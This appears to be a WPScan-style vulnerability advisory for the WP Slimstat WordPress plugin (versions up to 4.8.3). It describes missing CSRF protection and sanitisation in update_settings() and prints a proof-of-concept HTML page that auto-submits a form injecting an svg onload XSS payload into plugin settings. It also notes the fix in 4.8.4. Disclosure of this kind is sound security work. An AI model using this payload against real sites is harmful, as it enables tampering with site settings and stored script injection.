WP Slimstat <= 4.8.3 - CSRF to Stored XSS and Setting Updates



Description
Lack of CSRF check and sanitisation in the update_settings() function can lead to settings update, as well as Stored XSS issues
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin.php?page=slimconfig&tab=1" method="POST">
      <input type="hidden" name="options[posts_column_day_interval]" value='28"><svg/onload=alert(/XSS/)>' />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 4.8.4

References

URL https://plugins.trac.wordpress.org/changeset/2119485

Classification

Type MULTI

Miscellaneous

Views 2441
Verified Yes
WPVDB ID 9431

Timeline

Publicly Published 2019-07-08 (4 months ago)
Added 2019-07-08 (4 months ago)
Last Updated 2019-07-15 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin